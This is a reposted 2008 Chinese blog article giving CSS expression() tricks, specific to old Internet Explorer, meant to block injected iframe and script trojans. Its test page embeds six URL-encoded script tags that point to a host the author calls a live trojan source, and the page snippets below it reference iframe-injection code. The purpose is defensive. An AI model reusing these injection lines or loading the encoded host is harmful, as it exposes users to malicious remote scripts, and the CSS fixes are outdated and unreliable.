二行代码解决全部网页木马(含iframe/script木马)

最新推荐文章于 2023-05-18 14:11:48 发布
最新推荐文章于 2023-05-18 14:11:48 发布
阅读量169 收藏
点赞数
文章标签: xhtml javascript ViewUI
原文链接:http://www.cnblogs.com/yuanqiang/archive/2008/11/14/1333846.html
版权
先说明一下,不要一挂马就说dede有漏洞,请先阅读关于服务器被批量挂马的解决方案 

这里告诉大家用CSS代码屏蔽iframe/script木马 


注意,以下地址含有木马,请不要轻易访问: 



解决方案1: 
Copy code
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/ 
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}


原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。 

缺点:访客无法看到被感染了<script>木马的页面。 


解决方案2: 

Copy code
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} 
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}


原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。 


解决方案3: 

Copy code
iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');} 
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}


原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。 


解决方案4: 

Copy code
iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} 
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}


原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。


解决方案5: 

Copy code
iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} 
script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}


第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id,如lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script>  


以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试) 

Copy code
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" " http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
<html xmlns=" http://www.w3.org/1999/xhtml"
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>让JS木马的进程迅速中止的CSS代码</title> 
<style type="text/css" id="LinrStudio"> 
/*<![CDATA[*/ 
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');} 
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} 
/* 以后请在此关注最新木马处理方法: http://www.nihaoku.cn/ff/api.htm */ 
/*]]>*/ 
</style> 
</head> 
<body> 
<script type="text/javascript" src="1.js"></script> 
<script src=http://%76%63%63%64%2E%63%6E></script> 
<script src=" http://%76%63%63%64%2E%63%6E" type="text/javascript"></script> 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是页面本身的1 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是页面本身的2 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是页面本身的3 
<script src=http://%76%63%63%64%2E%63%6E></script> 
</body> 
</html>


其中1.js是自己本站的: 

Copy code
document.write("我是本站的JS文件"); 
document.write("<img src='http://www.baidu.com/p_w_picpaths/logo.gif' />");

转载于:https://www.cnblogs.com/yuanqiang/archive/2008/11/14/1333846.html

weixin_33938733
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
纯js超酷3D旋转木马特效插件
07-05
纯js超酷3D旋转木马特效插件
网页木马太猖獗-网马反击战
weixin_34356555的博客
05-08 347
【标题】国家环保总局官方网站疑似被挂马—网页木马【内容】         前段时间,我们的品牌通 联系通 等网站相继遭遇网页木马,深受其害。今天,无意中发现国家环保总局官方网站疑似被挂马。 现象截图:             网页木马相关技术总结:网页木马代码大全:一:框架挂马   &lt;iframe src=地址 width=0 height=0&gt;&lt;/iframe&gt; 二:js...
各种网页木马挂马的代码
jahn的专栏
09-30 2858
1、嵌入网页 以下是引用片段:  2、PHP网页挂马 以下是引用片段:   3、图片木马 以下是引用片段:   4、邮件木马 以下是引用片段:    5、flash木马 http://网页木马地址 插入木马地址 width=10 height=10", "GET" 宽度和高度,方式 后面的照添,更改木马地址就可以了。 6、做123.JS文件木马 以下是引用片段
二行代码解决全部网页木马
php菜鸟技术天地
06-02 1422
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。   前不久《http://bbs.blueidea.com/thread-2818052-1-1.html一行代码解决iframe挂马(包服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式
java网页木马代码_能够解网页木马代码的高人来看以下。谢谢!```
weixin_30750685的博客
02-28 425
能够解网页木马代码的高人来看以下。谢谢!```我们网站让入侵。挂了网马。找高手帮忙解密。解出来木马地址。谢谢。 很急。 联系Q290493945 有报酬!`var now = new Date();var miao =now.getSeconds();document.write("");if (miao>30&&miao<80){document.writel...
解决全部网页木马的技巧
12-01
网页木马,特别是基于JavaScript(<script>)的木马,已经成为网络安全的一大威胁。这些木马通常通过在网页中插入恶意脚本来实现对用户计算机的攻击,如iframe挂马、服务器端注入、客户端ARP注入等。面对这种情况,...
CSS代码 解决网页挂马问题
12-09
网页挂马通常通过IFRAME或嵌入的<script>标签来实现,这些标签指向恶意的外部资源,当用户访问页面时,恶意代码会被加载并执行。CSS代码可以通过针对IFRAME和<script>标签的特定选择器来干预其行为,从而阻止恶意...
网上收集asp 网页木马解决方案
03-21
一些关于iframe ,script木马解决方案
IE网页木马 - 使用 JS 实现打开网页后直接运行木马程序
LYSM
06-27 920
首先,这个木马的功能基于 IE 浏览器的 ActiveX 的功能,也就是说只适用于 IE 浏览器,如果你的浏览器没有打开 ActiveX 控件,百度搜吧。
css代码植入木马,CSS3 木马玩具
weixin_39753584的博客
08-04 205
CSS语言:CSSSCSS确定html {box-sizing: border-box;}*,*:after,*:before {box-sizing: inherit;}body {font-family: arial, sans-serif;color: #282828;font-size: 14px;padding: 10px;}a,a.active {color: inherit;text...
JS木马的原理及防范方法
何足道也
09-21 3508
木马一直是黑客的拿手技量。善于用木马的黑客,可以在原来的入侵基础之上达到更大的目的。如今,虽然木马的种类有很多。但其中IFRAME挂马比较早,相应的预防措施也比较多,其中用CSS配合JS脚本进行预防是主流方式。可这种预防方式也存在安全隐患,JS脚本也可以被用来挂马,令人防不胜防。我们下面要介绍反击JS挂马的方法。 JS挂马溯源 当IFRAME逐渐被黑客滥用的时候,有经验的安全工程师也开始研究相
js实现旋转木马
Zmikoo学习之路
05-07 708
<!DOCTYPE html> <html> <head> <title>旋转木马效果轮播图</title> <meta charset="utf-8"> <style type="text/css"> * { margin: 0; ...
防止CSS样式被挂网页木马(原文地址:www.52css.com)
weixin_34240520的博客
07-21 202
随着CSS网页布局应用的越来越广泛,Web标准逐渐普及,也创造了一个可乘之机。今天52CSS.com和大家讨论,预防CSS样式被挂网页木马。他们发现,用来实现页面的CSS,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范IFRAME挂马的CSS代码演变而来。   网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也涌现出各种各样的技术,...
dedecms:dedeajax2.js被植入js木马
zxy840552216的博客
08-30 216
这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下: //初始化xmldom function InitXDom(){ if(DedeXDOM!=null) return; var obj = null; if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox var parser = new DOMParser(); obj
视频直播app源码,纯JS实现旋转木马/3d相册
最新发布
云豹网络科技
05-18 225
4.遍历数组,使其沿y轴旋转Deg度。此处使用了原型,使用foreach方法遍历了数组,让其内每个图片都执行了function(el,index)。使用index下标区分开了数组内每个图片需要旋转的不同度数(第一张0°(Deg * 0) 第二张Deg度 (Deg * 1) 第三张(Deg * 2)度…以数组的形式获取,并根据其数组长度length来计算图片的旋转角度。以上就是 视频直播app源码,纯JS实现旋转木马/3d相册,更多内容欢迎关注之后的文章。视频直播app源码,纯JS实现旋转木马/3d相册。
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
热门推荐
Gleam的专栏
03-26 1万+
前言 这次我与大家分享的是我所总结的关于JS下载者脚本木马的分析与防御技术。之所以要选择这样的一个题目,是因为在日常的病毒分析工作中,每天都会遇到这类病毒样本,少则几个,多则几十个(当然了,更多的样本已经被自动分析系统拦截下来了)。而且这类的样本甚至还有愈演愈烈之势,很可能会长盛不衰。JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会
屏蔽底部/html后面被插入JS木马最简单方法
weixin_34357267的博客
11-25 547
2019独角兽企业重金招聘Python工程师标准>>> ...
原生js实现旋转木马效果
litcangosh的博客
09-02 1233
html部分 <div class="wrap" id="wrap"> <div class="slide" id="slide"> <ul> <li><a href=""><img src="images/slidepic1.jpg" alt=""></a>&lt...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值